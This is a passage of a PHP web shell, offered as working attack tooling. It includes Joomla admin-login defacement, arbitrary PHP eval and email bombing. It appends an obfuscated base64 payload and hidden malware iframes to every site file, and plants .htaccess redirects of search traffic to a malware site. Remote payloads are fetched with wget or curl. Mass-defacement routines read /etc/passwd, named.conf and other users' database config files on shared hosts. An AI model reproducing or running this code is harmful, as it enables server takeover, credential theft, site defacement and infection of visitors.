3432 $pos = strpos($buffer,'<dd class="message message">');
3433 if($pos === false)
3434 {
3435 echo("<center><font size=4><blink>Cannot Deface Joomla</blink></font></center>");
3436 }
3437 else
3438 {
3439 echo("<center><font class=txt size=4><blink>Joomla Defaced Successfully</blink></font></center>");
3440 }
3441 }
3442 else
3443 {
3444 $req =mysql_query("SELECT * from `".$dbprefix."templates_menu` WHERE client_id='0'");
3445 $data = mysql_fetch_array($req);
3446 $template_name=$data["template"];
3447
3448 $url2=$site_url."/index.php";
3449 $ch = curl_init();
3450 curl_setopt($ch, CURLOPT_URL, $url2);
3451 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3452 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3453 curl_setopt($ch, CURLOPT_HEADER, 1);
3454 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3455 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
3456 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
3457 $buffer = curl_exec($ch);
3458
3459 $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);
3460
3461 $url2=$site_url."/index.php";
3462 $ch = curl_init();
3463 curl_setopt($ch, CURLOPT_URL, $url2);
3464 curl_setopt($ch, CURLOPT_POST, 1);
3465 curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&".$hidden."=1");
3466 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3467 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3468 curl_setopt($ch, CURLOPT_HEADER, 0);
3469 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3470 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
3471 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
3472 $buffer = curl_exec($ch);
3473
3474 $pos = strpos($buffer,"com_config");
3475
3476 if($pos === false)
3477 {
3478 echo("<br>[-] Login Error");
3479 exit;
3480 }
3481
3482 $url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;
3483 $ch = curl_init();
3484 curl_setopt($ch, CURLOPT_URL, $url2);
3485 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3486 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3487 curl_setopt($ch, CURLOPT_HEADER, 0);
3488 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3489 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
3490 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
3491 $buffer = curl_exec($ch);
3492
3493 $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6);
3494
3495 if(!$hidden2)
3496 {
3497 echo("<br>[-] index.php Not found in Theme Editor");
3498 }
3499
3500 $url2=$site_url."/index.php?option=com_templates&layout=edit";
3501 $ch = curl_init();
3502 curl_setopt($ch, CURLOPT_URL, $url2);
3503 curl_setopt($ch, CURLOPT_POST, 1);
3504 curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$h."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");
3505 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3506 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3507 curl_setopt($ch, CURLOPT_HEADER, 0);
3508 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3509 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
3510 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
3511 $buffer = curl_exec($ch);
3512
3513 $pos = strpos($buffer,'<dd class="message message fade">');
3514 if($pos === false)
3515 {
3516 echo("<center><font size=4><blink>Cannot Deface Joomla</blink></font></center>");
3517 exit;
3518 }
3519 else
3520 {
3521 echo("<center><font class=txt size=4><blink>Joomla Defaced Successfully</blink></font></center>");
3522 }
3523 }
3524 }
3525}
3526else if(isset($_POST['pathtomass']) && $_POST['pathtomass'] != '' && isset($_POST['filetype']) && $_POST['filetype'] != '' && isset($_POST['mode']) && $_POST['mode'] != '' && isset($_POST['injectthis']) && $_POST['injectthis'] != '')
3527{
3528 $filetype = $_POST['filetype'];
3529
3530 $mode = "a";
3531
3532 if($_POST['mode'] == 'Apender')
3533 $mode = "a";
3534
3535 if($_POST['mode'] == 'Overwriter')
3536 $mode = "w";
3537
3538 if (is_dir($_POST['pathtomass']))
3539 {
3540 $lolinject = $_POST['injectthis'];
3541 $mypath = $_POST['pathtomass'] .$directorysperator. "*.".$filetype;
3542 if(substr($_POST['pathtomass'], -1) == "\\")
3543 $mypath = $_POST['pathtomass'] . "*.".$filetype;
3544 foreach (glob($mypath) as $injectj00)
3545 {
3546 if($injectj00 == getcwd().$_SERVER['SCRIPT_NAME'])
3547 continue;
3548 $fp=fopen($injectj00,$mode);
3549 if (fputs($fp,$lolinject))
3550 echo '<br><font class=txt size=3>'.$injectj00.' was injected<br></font>';
3551 else
3552 echo 'failed to inject '.$injectj00.'<br>';
3553 }
3554 $dirs = glob($_POST['pathtomass'] . '/*' , GLOB_ONLYDIR);
3555 foreach ($dirs as $dir)
3556 {
3557 injectdir($dir,$filetype,$mode,$lolinject);
3558 }
3559 echo "<center>".$mycount." files injected</center>";
3560 }
3561 else
3562 echo '<b>'.$_POST['pathtomass'].' is not available!</b>';
3563}
3564else if(isset($_POST['mailfunction']))
3565{
3566 if($_POST['mailfunction'] == "dobombing")
3567 {
3568 if(isset($_POST['to']) && isset($_POST['subject']) && isset($_POST['message']) && isset($_POST['times']) && $_POST['to'] != '' && $_POST['subject'] != '' && $_POST['message'] != '' && $_POST['times'] != '')
3569 {
3570 $times = $_POST['times'];
3571 while($times--)
3572 {
3573 if(isset($_POST['padding']))
3574 {
3575 $fromPadd = rand(0,9999);
3576 $subjectPadd = " -- ID : ".rand(0,9999999);
3577 $messagePadd = "\n\n------------------------------\n".rand(0,99999999);
3578
3579 }
3580 $from = "hello$fromPadd@abcd.in";
3581 if(!mail($_POST['to'],$_POST['subject'].$subjectPadd,$_POST['message'].$messagePadd,"From:".$from))
3582 {
3583 $error = 1;
3584 echo "<center><font size=3><blink><blink>Some Error Occured!</blink></font></center>";
3585 break;
3586 }
3587 }
3588 if($error != 1)
3589 echo "<center><font class=txt size=3><blink>Mail(s) Sent!</blink></font></center>";
3590 }
3591 }
3592 else if($_POST['mailfunction'] == "massmailing")
3593 {
3594 if(isset($_POST['to']) && isset($_POST['from']) && isset($_POST['subject']) && isset($_POST['message']))
3595 {
3596 if(mail($_POST['to'],$_POST['subject'],$_POST['message'],"From:".$_POST['from']))
3597 echo "<center><font class=txt size=3><blink>Mail Sent!</blink></font></center>";
3598 else
3599 echo "<center><font size=3><blink>Some Error Occured!</blink></font></center>";
3600 }
3601 }
3602}
3603else if(isset($_POST['code']))
3604{
3605 if($_POST['code'] != null && isset($_POST['intext']) && $_POST['intext'] == "true")
3606 {
3607 // FIlter Some Chars we dont need
3608 ?><br>
3609 <textarea name="code" class="box" cols="120" rows="10"><?php
3610 $code = str_replace("<?php","",$_POST['code']);
3611 $code = str_replace("<?","",$code);
3612 $code = str_replace("?>","",$code);
3613
3614 // Evaluate PHP CoDE!
3615 htmlspecialchars(eval($code));
3616 ?>
3617 </textarea><?php
3618 }
3619 else if($_POST['code'] != null && $_POST['intext'] == "false")
3620 {
3621 $code = str_replace("<?php","",$_POST['code']);
3622 $code = str_replace("<?","",$code);
3623 $code = str_replace("?>","",$code);
3624
3625 // Evaluate PHP CoDE!
3626 ?><br><font size="4">Result of execution this PHP-code :</font><br><font class=txt><?php htmlspecialchars(eval($code)); ?></font><?php
3627 }
3628}
3629else if(isset($_GET['infect']))
3630{
3631 $mal_code="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";
3632 $coun = 0;
3633 foreach (glob($_GET['path'] . $directorysperator . "*.php") as $injectj00)
3634 {
3635 if($injectj00 == getcwd().$_SERVER['SCRIPT_NAME'])
3636 continue;
3637 if($myfile=fopen($injectj00,'a'))
3638 {
3639 fputs($myfile, gzuncompress(base64_decode($mal_code)));
3640 fclose($myfile);
3641 $coun = 1;
3642 }
3643 }
3644 foreach (glob($_GET['path'] . $directorysperator . "*.htm") as $injectj00)
3645 {
3646 if($myfile=fopen($injectj00,'a'))
3647 {
3648 fputs($myfile, gzuncompress(base64_decode($mal_code)));
3649 fclose($myfile);
3650 $coun = 1;
3651 }
3652 }
3653 foreach (glob($_GET['path'] . $directorysperator . "*.html") as $injectj00)
3654 {
3655 if($myfile=fopen($injectj00,'a'))
3656 {
3657 fputs($myfile, gzuncompress(base64_decode($mal_code)));
3658 fclose($myfile);
3659 $coun = 1;
3660 }
3661 }
3662 if($coun == 1)
3663 echo "<center>Done !!!!<center>";
3664 else
3665 echo "<center>Cannot open files !!!!<center>";
3666}
3667else if(isset($_GET['infectiframe']))
3668{
3669 $coun = 0;
3670 $str = "<iframe width=0px height=0px frameborder=no name=frame1 src=".$malsite."> </iframe>";
3671 foreach (glob($_GET['path'] . $directorysperator . "*.php") as $injectj00)
3672 {
3673 if($injectj00 == getcwd().$_SERVER['SCRIPT_NAME'])
3674 continue;
3675 if($myfile=fopen($injectj00,'a'))
3676 {
3677 fputs($myfile, $str);
3678 fclose($myfile);
3679 $coun = 1;
3680 }
3681 }
3682 foreach (glob($_GET['path'] . $directorysperator . "*.htm") as $injectj00)
3683 {
3684 if($myfile=fopen($injectj00,'a'))
3685 {
3686 fputs($myfile, $str);
3687 fclose($myfile);
3688 $coun = 1;
3689 }
3690 }
3691 foreach (glob($_GET['path'] . $directorysperator . "*.html") as $injectj00)
3692 {
3693 if($myfile=fopen($injectj00,'a'))
3694 {
3695 fputs($myfile, $str);
3696 fclose($myfile);
3697 $coun = 1;
3698 }
3699 }
3700
3701
3702 if($coun == 1)
3703 echo "<center>Done !!!!<center>";
3704 else
3705 echo "<center>Cannot open files !!!!<center>";
3706}
3707else if(isset($_GET['redirect']))
3708{
3709 if($myfile = fopen(".htaccess",'a'))
3710 {
3711 $mal = "# BEGIN WordPress
3712RewriteEngine On
3713RewriteOptions inherit
3714RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
3715RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
3716RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
3717RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
3718RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
3719RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
3720RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
3721RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
3722RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
3723RewriteRule .* ".$malsite." [R,L]\n\r";
3724 fwrite($myfile, $mal);
3725 fclose($myfile);
3726 echo "<center>Done !!!!<center>";
3727 }
3728 else
3729 echo "<center>Cannot open file !!!!<center>";
3730}
3731else if(isset($_GET['malware']))
3732{ ?>
3733 <input type="hidden" id="malpath" value="<?php echo $_GET["dir"]; ?>">
3734 <center><table><tr><td><a href=# onClick="malwarefun('infect')"><font class=txt size="4">| Infect Users |</font></a></td>
3735 <td><a href=# onClick="malwarefun('infectiframe')"><font class=txt size="4">| Infect Users with Iframe |</font></a></td>
3736 <td><a href=javascript:void(0) onClick="malwarefun('redirect')"><font class=txt size="4">| Redirect Search Engine TO Malwared site |</font></a></td></tr></table></center>
3737 <div id="showmal"></div>
3738 <?php
3739}
3740else if(isset($_GET['codeinsert']))
3741{
3742 if($file1 = fopen(".htaccess",'r'))
3743 {
3744 ?><div id="showcode"></div>
3745 <form method=post>
3746 <textarea rows=9 cols=110 name="code" class=box><?php while(!feof($file1)) { echo fgets($file1); } ?></textarea><br>
3747 <input type="button" onClick="codeinsert(code.value)" value=" Insert " class=but>
3748 </form>
3749 <?php }
3750 else
3751 echo "<center>Cannot Open File!!</center>";
3752}
3753else if(isset($_POST['getcode']))
3754{
3755 if($myfile = fopen(".htaccess",'a'))
3756 {
3757 fwrite($myfile, $_POST['getcode']);
3758 fwrite($myfile, "\n\r");
3759 fclose($myfile);
3760 echo "<font class=txt>Code Inserted Successfully!!!!</font>";
3761 }
3762 else
3763 echo "Permission Denied";
3764}
3765else if(isset($_GET['uploadurl']))
3766{
3767 $functiontype = trim($_GET['functiontype']);
3768 $wurl = trim($_GET['wurl']);
3769 $path = magicboom($_GET['path']);
3770
3771 function remotedownload($cmd,$url)
3772 {
3773 $namafile = basename($url);
3774 switch($cmd)
3775 {
3776 case 'wwget':
3777 execmd(which('wget')." ".$url." -O ".$namafile);
3778 break;
3779 case 'wlynx':
3780 execmd(which('lynx')." -source ".$url." > ".$namafile);
3781 break;
3782 case 'wfread' :
3783 execmd($wurl,$namafile);
3784 break;
3785 case 'wfetch' :
3786 execmd(which('fetch')." -o ".$namafile." -p ".$url);
3787 break;
3788 case 'wlinks' :
3789 execmd(which('links')." -source ".$url." > ".$namafile);
3790 break;
3791 case 'wget' :
3792 execmd(which('GET')." ".$url." > ".$namafile);
3793 break;
3794 case 'wcurl' :
3795 execmd(which('curl')." ".$url." -o ".$namafile);
3796 break;
3797 default:
3798 break;
3799 }
3800 return $namafile;
3801 }
3802 $namafile = remotedownload($functiontype,$wurl);
3803
3804 $fullpath = $path . $directorysperator . $namafile;
3805 if(is_file($fullpath))
3806 {
3807 echo "<center><font class=txt>File uploaded to $fullpath</font></center>";
3808 }
3809 else
3810 echo "<center>Failed to upload $namafile</center>";
3811}
3812else if(isset($_GET['createfolder']))
3813{
3814 if(!mkdir($_GET['createfolder']))
3815 echo '<BR>Failed To create<BR><input name="save" type="button" onClick="cancel()" value=" OK " id="spacing" class="but"/><BR><BR>';
3816 else
3817 echo '<BR><font class=txt>Folder Created Successfully</font><BR><input name="save" type="button" onClick="cancel()" value=" OK " id="spacing" class="but"/><BR><BR>';
3818}
3819else if(isset($_GET['selfkill']))
3820{
3821 if(unlink($curfile))
3822 echo "<br><center><font size=5>Good Bye......</font></center>";
3823 else
3824 echo "<br><center><font size=5>Shell cannot be removed......</font></center>";
3825}
3826else if(isset($_GET['Create']))
3827{
3828 ?><BR>
3829 <form method="post">
3830 <input type="hidden" name="filecreator" value="<?php echo $_GET['Create']; ?>">
3831 <textarea name="filecontent" rows="12" cols="100" class="box"></textarea><br />
3832 <input type="button" onClick="createfile(filecreator.value,filecontent.value)" value=" Save " class="but"/>
3833 <input name="save" type="button" onClick="cancel()" value="Cancel" id="spacing" class="but"/>
3834 </form>
3835
3836<?php }
3837else if(isset($_GET['readfile']))
3838{
3839 if(is_file($_GET['readfile']))
3840 {
3841 $owner = "0/0";
3842 if($os == "Linux")
3843 $owner = getOGid($_GET['readfile']);
3844 ?>
3845 <form>
3846 <table style="width:57%;">
3847 <tr align="left">
3848 <td align="left">File : </td><td><font class=txt><?php echo $_GET['readfile'];?></font></td><td align="left">Permissions : </td><td><a href=javascript:void(0) onClick="fileaction('perms','<?php echo addslashes($_GET['readfile']); ?>')"><?php echo filepermscolor($_GET['readfile']);?></a></td>
3849 </tr>
3850 <tr>
3851 <td>Size : </td><td><?php echo HumanReadableFileSize(filesize($_GET['readfile']));?></td><td>Owner/Group : </td><td><font class=txt><?php echo $owner;?></font></td>
3852 </tr>
3853 </table>
3854 <textarea name="content" rows="15" cols="100" class="box"><?php
3855 $content = htmlspecialchars(file_get_contents($_GET['readfile']));
3856 if($content)
3857 {
3858 echo $content;
3859 }
3860 else if(function_exists('fgets') && function_exists('fopen') && function_exists('feof'))
3861 {
3862 if(filesize($_GET['readfile']) != 0 )
3863 {
3864 fopen($_GET['readfile']);
3865 while(!feof())
3866 {
3867 echo htmlspecialchars(fgets($_GET['readfile']));
3868 }
3869 }
3870 }
3871
3872 ?>
3873 </textarea><br />
3874 <input name="save" type="button" onClick="savemyfile('<?php echo addslashes($_GET['readfile']); ?>',content.value)" value="Save Changes" id="spacing" class="but"/>
3875 <input type="button" onClick="cancel()" value="cancel" class="but" />
3876 </form>
3877 <?php
3878 }
3879 else
3880 echo '<BR><input name="save" type="button" onClick="cancel()" value=" OK " id="spacing" class="but"/><BR>File does not exist !!!!<BR>';
3881}
3882else if(isset($_POST['filecreator'])&&isset($_POST['filecontent']))
3883{
3884 $content = $_POST['filecontent'];
3885 if($file_pointer = fopen($_POST['filecreator'], "w+"))
3886 {
3887 fwrite($file_pointer, $content);
3888 fclose($file_pointer);
3889 echo "<font class=txt>File Created Successfully</font>";
3890 }
3891 else
3892 echo "Cannot Create File";
3893}
3894else if(isset($_REQUEST["massdeface"]))
3895{
3896?><center><table><tr><td><a href=# onClick="getmydefacedata('masswp')"><font class=txt size="4">| Wordpress |</font></a></td>
3897 <td><a href=# onClick="getmydefacedata('massjo')"><font class=txt size="4">| Joomla |</font></a></td>
3898 <td><a href=# onClick="getmydefacedata('massvb')"><font class=txt size="4">| Vbulletin |</font></a></td>
3899 </tr></table></center><br><div id="showmydeface"></div><?php
3900}
3901else if(isset($_REQUEST["masswp"]))
3902{
3903 ?><center><form method="post">
3904 <textarea id="massdef" cols=80 rows="19" class="box">You Just Got Hacked</textarea>
3905 <br><input type="button" onClick="massdeface('domasswp',massdef.value)" class="but" value=" Go "></form></center><br><div id="showdef"></div><?php
3906}
3907else if(isset($_REQUEST["massjo"]))
3908{
3909 ?><center><form method="post"><textarea id="massdef" cols=80 rows="20" class="box">You Just Got Hacked</textarea>
3910 <br><input type="button" onClick="massdeface('domassjo',massdef.value)" class="but" value=" Go "></form></center><br><div id="showdef"></div><?php
3911}
3912else if(isset($_REQUEST["massvb"]))
3913{
3914 ?><center><form method="post"><textarea id="massdef" cols=80 rows="20" class="box">You Just Got Hacked</textarea>
3915 <br><input type="button" onClick="massdeface('domassvb',massdef.value)" class="but" value=" Go "></form></center><br><div id="showdef"></div><?php
3916}
3917else if(isset($_REQUEST["massscript"]))
3918{
3919 if($os != "Windows")
3920 {
3921 $url = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
3922 $path=explode('/',$url);
3923 $url =str_replace($path[count($path)-1],'',$url);
3924
3925 if($_REQUEST["massscript"] == "domasswp")
3926 {
3927 echo "<center><table border=1 style='width:70%;'><tr align=center><th>Site</th><th>Message</th><tr>";
3928 mkdir("dhanush");
3929 chdir("dhanush");
3930 execmd("ln -s / root");
3931 $file3 = 'Options all
3932 DirectoryIndex Sux.html
3933 AddType text/plain .php
3934 AddHandler server-parsed .php
3935 AddType text/plain .html
3936 AddHandler txt .html
3937 Require None
3938 Satisfy Any
3939 ';
3940 $fp3 = fopen('.htaccess','w');
3941 $fw3 = fwrite($fp3,$file3);
3942 @fclose($fp3);
3943 if(@file('/etc/passwd'))
3944 {
3945 $users = file('/etc/passwd');
3946 foreach($users as $user)
3947 {
3948 $user = explode(':', $user);
3949
3950 $conf = @file_get_contents($url."dhanush/root/home/".$user[0]."/public_html/wp-config.php");
3951 if(entre2v2($conf,"define('DB_USER', '","');"))
3952 changeindexwp($conf,$_REQUEST['massdef']);
3953 }
3954 }
3955 else
3956 {
3957 $temp = "";
3958 $val1 = 0;
3959 $val2 = 1000;
3960 for(;$val1 <= $val2;$val1++)
3961 {
3962 $uid = @posix_getpwuid($val1);
3963 if ($uid)
3964 $temp .= join(':',$uid)."\n";
3965 }
3966
3967 $temp = trim($temp);
3968
3969 if($file5 = fopen("test.txt","w"))
3970 {
3971 fputs($file5,$temp);
3972 fclose($file5);
3973
3974 $file = fopen("test.txt", "r");
3975 while(!feof($file))
3976 {
3977 $s = fgets($file);
3978 $matches = array();
3979 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
3980 $matches = str_replace("home/","",$matches[1]);
3981 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
3982 continue;
3983 $conf = @file_get_contents($url."dhanush/root/home/".$matches."/public_html/wp-config.php");
3984 if(entre2v2($conf,"define('DB_USER', '","');"))
3985 changeindexwp($conf,$_REQUEST['massdef']);
3986 }
3987 fclose($file);
3988 }
3989 }
3990 }
3991 elseif($_REQUEST["massscript"] == "domassjo")
3992 {
3993 mkdir("dhanush");
3994 chdir("dhanush");
3995 $d0mains = @file("/etc/named.conf");
3996 if($d0mains)
3997 {
3998 $defcount = 0;
3999 echo "<center><table border=1 style='width:80%;'><tr align=center><th>Login new info</th><th>Login info</th><th>Site</th><th>Message</th><tr>";
4000 foreach($d0mains as $d0main)
4001 {
4002 if(eregi("zone",$d0main))
4003 {
4004 preg_match_all('#zone "(.*)"#', $d0main, $domains);
4005 flush();
4006
4007 if(strlen(trim($domains[1][0])) > 2)
4008 {
4009 $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
4010 $conf = @file_get_contents($url."dhanush/root/home/".$user['name']."/public_html/configuration.php");
4011 if(entre2v2($conf,$dol."user = '","';"))
4012 changeindexjo($conf,$_REQUEST['massdef'],$domains[1][0]);
4013 }
4014 }
4015 }
4016 echo '</table><br><h3>'.$defcount.' sites defaced</h3>';
4017 }
4018 else
4019 echo "Cannot Read /etc/named.conf";
4020 }
4021 elseif($_REQUEST["massscript"] == "domassvb")
4022 {
4023 mkdir("dhanush");
4024 chdir("dhanush");
4025 echo "<center><table border=1 style='width:70%;'><tr align=center><th>Site</th><th>Message</th><tr>";
4026
4027 if(@file('/etc/passwd'))
4028 {
4029 $users = file('/etc/passwd');
4030 foreach($users as $user)
4031 {
4032 $user = explode(':', $user);
4033 $conf = @file_get_contents($url."dhanush/root/home/".$user['0']."/public_html/includes/config.php");
4034 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
4035 changeindexvb($conf,$_REQUEST['massdef']);
4036 $conf = @file_get_contents($url."dhanush/root/home/".$user['0']."/public_html/vb/configuration.php");
4037 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
4038 changeindexvb($conf,$_REQUEST['massdef']);
4039 $conf = @file_get_contents($url."dhanush/root/home/".$user['0']."/public_html/forum/configuration.php");
4040 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
4041 changeindexvb($conf,$_REQUEST['massdef']);
4042 $conf = @file_get_contents($url."dhanush/root/home/".$user['0']."/public_html/core/configuration.php");
4043 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
4044 changeindexvb($conf,$_REQUEST['massdef']);
4045 $conf = @file_get_contents($url."dhanush/root/home/".$user['0']."/public_html/vb/core/configuration.php");
4046 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
4047 changeindexvb($conf,$_REQUEST['massdef']);
4048 }
4049 }
4050 else
4051 {
4052 $temp = "";
4053 $val1 = 0;
4054 $val2 = 1000;
4055 for(;$val1 <= $val2;$val1++)
4056 {
4057 $uid = @posix_getpwuid($val1);
4058 if ($uid)
4059 $temp .= join(':',$uid)."\n";
4060 }
4061
4062 $temp = trim($temp);
4063
4064 if($file5 = fopen("test.txt","w"))
4065 {
4066 fputs($file5,$temp);
4067 fclose($file5);
4068
4069 $file = fopen("test.txt", "r");
4070 while(!feof($file))
4071 {
4072 $s = fgets($file);
4073 $matches = array();
4074 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
4075 $matches = str_replace("home/","",$matches[1]);
4076 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
4077 continue;
4078 $conf = @file_get_contents($url."dhanush/root/home/".$matches."/public_html/includes/config.php");
4079 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
4080 changeindexvb($conf,$_REQUEST['massdef']);
4081 $conf = @file_get_contents($url."dhanush/root/home/".$matches."/public_html/vb/configuration.php");
